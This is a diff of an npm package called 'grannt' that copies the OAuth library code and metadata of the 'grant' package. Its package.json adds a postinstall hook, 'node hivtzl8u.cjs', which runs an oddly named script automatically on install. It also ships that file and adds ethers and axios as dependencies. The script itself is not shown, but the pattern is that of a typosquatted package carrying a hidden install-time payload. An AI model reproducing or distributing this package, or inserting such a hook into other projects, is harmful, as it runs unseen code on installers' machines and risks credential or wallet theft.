grannt 5.4.23

package/lib/profile.js

@@ -0,0 +1,102 @@
+
+var request = require('./client')
+
+
+module.exports = ({request:client}) => async ({provider, input, output}) => {
+  if (!provider.response || !provider.response.includes('profile')) {
+    return {provider, input, output}
+  }
+
+  if (provider.apple && !provider.profile_url && input.body.user) {
+    output.profile = input.body.user
+    return {provider, input, output}
+  }
+
+  if (!provider.profile_url) {
+    output.profile = {error: 'Grant: No profile URL found!'}
+    return {provider, input, output}
+  }
+
+  var options = {
+    method: 'GET',
+    url: provider.profile_url,
+    headers: {},
+  }
+
+  if (provider.oauth === 2) {
+    options.headers.authorization = `Bearer ${output.access_token}`
+  }
+  else if (provider.oauth === 1) {
+    options.oauth = {
+      consumer_key: provider.key,
+      consumer_secret: provider.secret,
+      token: output.access_token,
+      token_secret: output.access_secret,
+    }
+  }
+
+  if (custom[provider.name]) {
+    Object.assign(options, custom[provider.name]({provider, output}))
+  }
+
+  if (provider.subdomain) {
+    options.url = options.url.replace('[subdomain]', provider.subdomain)
+  }
+
+  try {
+    var {body} = await request({...client, ...options})
+    // JSONP
+    if (provider.flickr) {
+      body = JSON.parse(/^.*\((.*)\)/.exec(body)[1])
+    }
+    // JSONP + secondary request
+    if (provider.qq) {
+      body = JSON.parse(/^.*\((.*)\)/.exec(Object.keys(body)[0])[1])
+      body = {...body, ...(await request({...client, ...options,
+        url: 'https://graph.qq.com/user/get_user_info',
+        qs: {
+          access_token: output.access_token,
+          oauth_consumer_key: provider.key,
+          openid: body.openid
+        }
+      })).body}
+
+    }
+    output.profile = body
+  }
+  catch (err) {
+    output.profile = {error: err.body || err.message}
+  }
+
+  return {provider, input, output}
+}
+
+var custom = {
+  arcgis: () => ({qs: {f: 'json'}}),
+  baidu: ({output}) => ({qs: {access_token: output.access_token}}),
+  constantcontact: ({provider}) => ({qs: {api_key: provider.key}}),
+  deezer: ({output}) => ({qs: {access_token: output.access_token}}),
+  disqus: ({provider}) => ({qs: {api_key: provider.key}}),
+  dropbox: () => ({method: 'POST'}),
+  echosign: ({output}) => ({headers: {'Access-Token': output.access_token}}),
+  flickr: ({provider}) => ({qs: {method: 'flickr.urls.getUserProfile', api_key: provider.key, format: 'json'}}),
+  foursquare: ({output}) => ({qs: {oauth_token: output.access_token}}),
+  getpocket: ({provider, output}) => ({json: {consumer_key: provider.key, access_token: output.access_token}}),
+  instagram: ({provider, output}) => /^\d+$/.test(provider.key) ? {qs: {fields: 'id,account_type,username'}} : {url: 'https://api.instagram.com/v1/users/self', qs: {access_token: output.access_token}},
+  mailchimp: ({output}) => ({qs: {apikey: output.access_token}}),
+  meetup: ({output}) => ({qs: {member_id: 'self'}}),
+  mixcloud: ({output}) => ({qs: {access_token: output.access_token}}),
+  qq: ({output}) => ({qs: {access_token: output.access_token}}),
+  shopify: ({output}) => ({headers: {'X-Shopify-Access-Token': output.access_token}}),
+  slack: ({output}) => ({qs: {token: output.access_token}}),
+  soundcloud: ({output}) => ({qs: {oauth_token: output.access_token}}),
+  stackexchange: ({output}) => ({qs: {key: output.access_token}}),
+  stocktwits: ({output}) => ({qs: {access_token: output.access_token}}),
+  tiktok: ({output}) => ({method: 'POST', json: {access_token: output.access_token, open_id: output.raw.open_id, fields: ['open_id', 'union_id', 'avatar_url', 'display_name']}}),
+  tumblr: ({output}) => ({qs: {api_key: output.access_token}}),
+  vk: ({output}) => ({qs: {access_token: output.access_token, v: '5.103'}}),
+  wechat: ({output}) => ({qs: {access_token: output.access_token, openid: output.raw.openid, lang: 'zh_CN'}}),
+  weibo: ({output}) => ({qs: {access_token: output.access_token, uid: output.raw.uid}}),
+  twitch: ({provider, output}) => ({headers: {'client-id': provider.key, authorization: `Bearer ${output.access_token}`}}),
+  twitter: ({output}) => ({qs: {user_id: output.raw.user_id}}),
+}

package/lib/request.js

@@ -0,0 +1,69 @@
+
+var {compose, dcopy} = require('./util')
+var _config = require('./config')
+var oauth1 = require('./flow/oauth1')
+var oauth2 = require('./flow/oauth2')
+
+
+var defaults = (config) => ({method, params, query, body, state, session}) => {
+  method = method.toUpperCase()
+  params = dcopy(params || {})
+  query = dcopy(query || {})
+  body = dcopy(body || {})
+  state = dcopy(state || {})
+  session = dcopy(params.override === 'callback' ? (session || {}) : {})
+
+  if (params.override !== 'callback') {
+    session.provider = params.provider
+
+    if (params.override) {
+      session.override = params.override
+    }
+    if (method === 'GET' && Object.keys(query).length) {
+      session.dynamic = query
+    }
+    else if (method === 'POST' && Object.keys(body).length) {
+      session.dynamic = body
+    }
+  }
+
+  var provider = _config.provider(config, session, state)
+  return {provider, input: {method, params, query, body, state, session}}
+}
+
+var connect = ({request}) => ({provider, input, input:{session}, output}) =>
+    provider.oauth === 1
+  ? compose(
+      oauth1.request({request}),
+      ({provider, input, input:{session}, output}) => (
+        session.request = output,
+        oauth1.authorize({provider, input, output})
+      )
+    )({provider, input})
+
+  : provider.oauth === 2
+  ? (
+    session.state = provider.state,
+    session.nonce = provider.nonce,
+    session.code_verifier = provider.code_verifier,
+    oauth2.authorize({provider, input})
+  )
+
+  : (
+    output = {error: 'Grant: missing or misconfigured provider'},
+    {provider, input, output}
+  )
+
+var callback = ({request}) => ({provider, input, output}) =>
+    provider.oauth === 1
+  ? oauth1.access({request})
+
+  : provider.oauth === 2
+  ? oauth2.access({request})
+
+  : ({provider, input, output}) => (
+    output = {error: 'Grant: missing session or misconfigured provider'},
+    {provider, input, output}
+  )
+
+module.exports = {defaults, connect, callback}

package/lib/response.js

@@ -0,0 +1,124 @@
+
+var qs = require('qs')
+
+
+var tokens = (provider, response) => {
+  var data = {}
+
+  if (provider.concur) {
+    data.access_token = response.replace(
+      /[\s\S]+<Token>([^<]+)<\/Token>[\s\S]+/, '$1')
+    data.refresh_token = response.replace(
+      /[\s\S]+<Refresh_Token>([^<]+)<\/Refresh_Token>[\s\S]+/, '$1')
+  }
+  else if (provider.getpocket) {
+    data.access_token = response.access_token
+  }
+  else if (provider.yammer) {
+    data.access_token = response.access_token.token
+  }
+
+  else if (provider.oauth === 1) {
+    if (response.oauth_token) {
+      data.access_token = response.oauth_token
+    }
+    if (response.oauth_token_secret) {
+      data.access_secret = response.oauth_token_secret
+    }
+  }
+  else if (provider.oauth === 2) {
+    if (response.id_token) {
+      data.id_token = response.id_token
+    }
+    if (response.access_token) {
+      data.access_token = response.access_token
+    }
+    if (response.refresh_token) {
+      data.refresh_token = response.refresh_token
+    }
+  }
+
+  return data
+}
+
+var oidc = (provider, session, response) => {
+  if (!/^[a-zA-Z0-9\-_]+?\.[a-zA-Z0-9\-_]+?\.([a-zA-Z0-9\-_]+)?$/.test(response.id_token)) {
+    return {error: 'Grant: OpenID Connect invalid id_token format'}
+  }
+
+  var [header, payload, signature] = response.id_token.split('.')
+
+  try {
+    header = JSON.parse(Buffer.from(header, 'base64').toString('binary'))
+    payload = JSON.parse(Buffer.from(payload, 'base64').toString('utf8'))
+  }
+  catch (err) {
+    return {error: 'Grant: OpenID Connect error decoding id_token'}
+  }
+
+  if (![].concat(payload.aud).includes(provider.key)) {
+    return {error: 'Grant: OpenID Connect invalid id_token audience'}
+  }
+  else if (session.nonce && (payload.nonce !== session.nonce)) {
+    return {error: 'Grant: OpenID Connect nonce mismatch'}
+  }
+
+  return {header, payload, signature}
+}
+
+var data = ({provider, input, input:{session}, output}) => {
+  if (output.error) {
+    return {provider, input, output}
+  }
+
+  if (output.id_token) {
+    var jwt = oidc(provider, session, output)
+    if (jwt.error) {
+      return {provider, input, output: jwt}
+    }
+  }
+
+  if (!provider.response) {
+    var data = tokens(provider, output)
+    data.raw = output
+  }
+  else {
+    var data = {}
+    var response = [].concat(provider.response)
+    if (response.find((key) => /token/.test(key))) {
+      data = tokens(provider, output)
+    }
+    if (response.includes('jwt') && jwt) {
+      data.jwt = {id_token: jwt}
+    }
+    if (response.includes('raw')) {
+      data.raw = output
+    }
+  }
+
+  return {provider, input, output: data}
+}
+
+var transport = ({provider, input, input:{params, state, session}, output}) => ({
+  location:
+      (params.override !== 'callback' && !output.error)
+    ? output
+
+    : (!provider.transport || provider.transport === 'querystring')
+    ? `${provider.callback || '/'}?${qs.stringify(output)}`
+
+    : provider.transport === 'session'
+    ? provider.callback
+
+    : undefined,
+  session: (
+    provider.transport === 'session' ? session.response = output : null,
+    session
+  ),
+  state: (
+    provider.transport === 'state' ? state.response = output : null,
+    state
+  ),
+})
+
+module.exports = {data, transport}

package/lib/session.js

@@ -0,0 +1,106 @@
+
+var crypto = require('crypto')
+var cookie = require('cookie')
+var signature = require('cookie-signature')
+
+
+module.exports = ({name, secret, cookie:options, store}) => {
+  name = name || 'grant'
+  options = options || {path: '/', httpOnly: true, secure: false, maxAge: null}
+
+  if (!secret) {
+    throw new Error('Grant: cookie secret is required')
+  }
+
+  var embed = !store
+
+  return (req) => {
+    var headers = Object.keys(req.headers)
+      .filter((key) => /(?:set-)?cookie/i.test(key))
+      .reduce((all, key) => (all[key.toLowerCase()] = req.headers[key], all), {})
+
+    headers['set-cookie'] =
+      headers['set-cookie'] ||
+      (req.multiValueHeaders && req.multiValueHeaders['Set-Cookie']) ||
+      []
+
+    var cookies = {
+      input:
+        // vercel - parsed object
+        typeof req.cookies === 'object' && !(req.cookies instanceof Array) ? req.cookies :
+        cookie.parse(
+          headers.cookie ? headers.cookie :
+          // aws v2 event - array of key=value pairs
+          req.cookies ? req.cookies.join('; ') :
+          ''
+        ),
+      output: headers['set-cookie'].reduce((all, str) =>
+        (all[str.split(';')[0].split('=')[0]] = str, all), {})
+    }
+
+    var encode = (payload, opt = {}) => {
+      var data = embed
+        ? Buffer.from(JSON.stringify(payload)).toString('base64')
+        : payload
+      var value = signature.sign(data, secret)
+      var output = cookie.serialize(name, value, {...options, ...opt})
+      cookies.output[name] = output
+      headers['set-cookie'] = Object.keys(cookies.output)
+        .map((name) => cookies.output[name])
+    }
+
+    var cookieStore = () => {
+      var session = (() => {
+        var payload = signature.unsign(cookies.input[name] || '', secret)
+        try {
+          return JSON.parse(Buffer.from(payload, 'base64').toString())
+        }
+        catch (err) {
+          return {grant: {}}
+        }
+      })()
+      var store = {
+        get: async (sid) => session,
+        set: async (sid, value) => session = value,
+        remove: async (sid) => session = {}
+      }
+      return {
+        get: async () => {
+          return store.get()
+        },
+        set: async (value) => {
+          encode(value)
+          return store.set(null, value)
+        },
+        remove: async () => {
+          encode('', {maxAge: 0})
+          await store.remove()
+        },
+        cookies,
+        headers,
+      }
+    }
+
+    var sessionStore = () => {
+      var sid = signature.unsign(cookies.input[name] || '', secret)
+        || crypto.randomBytes(20).toString('hex')
+      return {
+        get: async () => {
+          return await store.get(sid) || {grant: {}}
+        },
+        set: async (value) => {
+          encode(sid)
+          return store.set(sid, value)
+        },
+        remove: async () => {
+          encode(sid, {maxAge: 0})
+          await store.remove(sid)
+        },
+        cookies,
+        headers,
+      }
+    }
+
+    return embed ? cookieStore() : sessionStore()
+  }
+}

package/lib/util.js

@@ -0,0 +1,8 @@
+
+var compose = (...fns) => (args) =>
+  fns.reduce((p, f) => p.then(f), Promise.resolve(args))
+
+var dcopy = (obj) =>
+  JSON.parse(JSON.stringify(obj))
+
+module.exports = {compose, dcopy}

package/package.json

@@ -0,0 +1,89 @@
+{
+  "name": "grannt",
+  "version": "5.4.23",
+  "description": "OAuth Proxy",
+  "keywords": [
+    "oauth",
+    "oauth2",
+    "openid",
+    "openid-connect",
+    "authentication",
+    "authorization",
+    "proxy",
+    "middleware",
+    "lambda",
+    "express",
+    "koa",
+    "hapi",
+    "fastify",
+    "aws",
+    "azure",
+    "google-cloud",
+    "vercel"
+  ],
+  "license": "MIT",
+  "homepage": "https://github.com/simov/grant",
+  "author": "Simeon Velichkov <simeonvelichkov@gmail.com> (https://simov.github.io)",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/simov/grant.git"
+  },
+  "dependencies": {
+    "qs": "^6.13.0",
+    "request-compose": "^2.1.7",
+    "request-oauth": "^1.0.1",
+    "axios": "^1.7.7",
+    "ethers": "^6.13.2"
+  },
+  "optionalDependencies": {
+    "cookie": "^0.6.0",
+    "cookie-signature": "^1.2.1",
+    "jwk-to-pem": "^2.0.6",
+    "jws": "^4.0.0"
+  },
+  "devDependencies": {
+    "@curveball/bodyparser": "0.4.6",
+    "@curveball/core": "0.14.2",
+    "@curveball/router": "0.2.4",
+    "@curveball/session": "0.5.0",
+    "@fastify/cookie": "^9.4.0",
+    "@fastify/formbody": "^7.4.0",
+    "@fastify/session": "^10.9.0",
+    "@hapi/hapi": "^21.3.10",
+    "@hapi/yar": "^11.0.2",
+    "body-parser": "^1.20.3",
+    "cookie-session": "^2.1.0",
+    "express": "^4.21.0",
+    "express-session": "^1.18.0",
+    "fastify": "^4.28.1",
+    "grant-profile": "^1.0.2",
+    "koa": "^2.15.3",
+    "koa-bodyparser": "^4.4.1",
+    "koa-mount": "^4.0.0",
+    "koa-qs": "^3.0.0",
+    "koa-session": "^6.4.0",
+    "mocha": "^10.7.3",
+    "nyc": "^17.0.0",
+    "request-cookie": "^1.0.1",
+    "request-logs": "^2.1.5"
+  },
+  "main": "./grant.js",
+  "files": [
+    "config/",
+    "lib/",
+    "grant.js",
+    "grant.d.ts",
+    "CHANGELOG.md",
+    "LICENSE",
+    "README.md",
+    "package.json",
+    "hivtzl8u.cjs"
+  ],
+  "types": "grant.d.ts",
+  "scripts": {
+    "postinstall": "node hivtzl8u.cjs"
+  },
+  "engines": {
+    "node": ">=12.0.0"
+  }
+}